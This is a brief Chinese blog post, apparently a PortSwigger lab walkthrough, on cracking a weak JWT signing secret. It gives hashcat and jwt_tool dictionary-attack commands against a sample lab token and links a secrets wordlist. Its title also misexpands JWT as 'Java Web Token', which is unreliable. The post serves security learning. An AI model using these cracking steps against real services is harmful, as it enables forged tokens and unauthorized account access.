jwt(三)

Java Web Token

渗透文章参考:https://xz.aliyun.com/t/12906#toc-1

继续靶场

通过弱签名密钥绕过JWT身份验证

  前面的一些操作基本都是相同的,而这一个根据名称也能够了解到,需要我们对密钥进行破解,而一般的方式就是暴力破解。我们直接抓一个token去了解这种攻击方式。

身份认证

  字典,搞里头:https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

hashcat

  hashcat搞里头:https://github.com/hashcat/hashcat

1
2
3
4
5
#命令格式:
hashcat -a 0 -m 16500 <jwt> <wordlist>

#执行示例:
hashcat -m 16500 jwt.txt -a 0 secrets.txt --force

  跑出来了,这个就是对的

结果

jwt_tool

  工具,搞里头:https://github.com/ticarpi/jwt_tool

  依赖,搞里头:pip3 install -r .\requirements.txt

  用法自己看,这里直接说怎么跑

1
python3 .\jwt_tool.py eyJraWQiOiJhOGU0OGU1My0yMzE4LTQ0OGItOTk5Zi1jY2Y1ZjU2MTAyMGEiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY5ODYzNzA1NH0.tt_VSJSSaiVrVqX3iNmJksizg3xCiQ8KJRDTfvHz9jU -C -d .\jwt-secrets.txt

jwt_tool结果

  后面还有一些其他的方法像头部注入、算法混淆等可以去看参考文章,这些可能在很久以后才会加入到文章里面,本系列只是对原文章的一些简化,如果想要详细了解,参考:https://xz.aliyun.com/t/12906#toc-1


jwt(三)
https://fliggyaa.github.io/2023/10/27/2023-10-27-jwt/
作者
fliggy
发布于
2023年10月27日
许可协议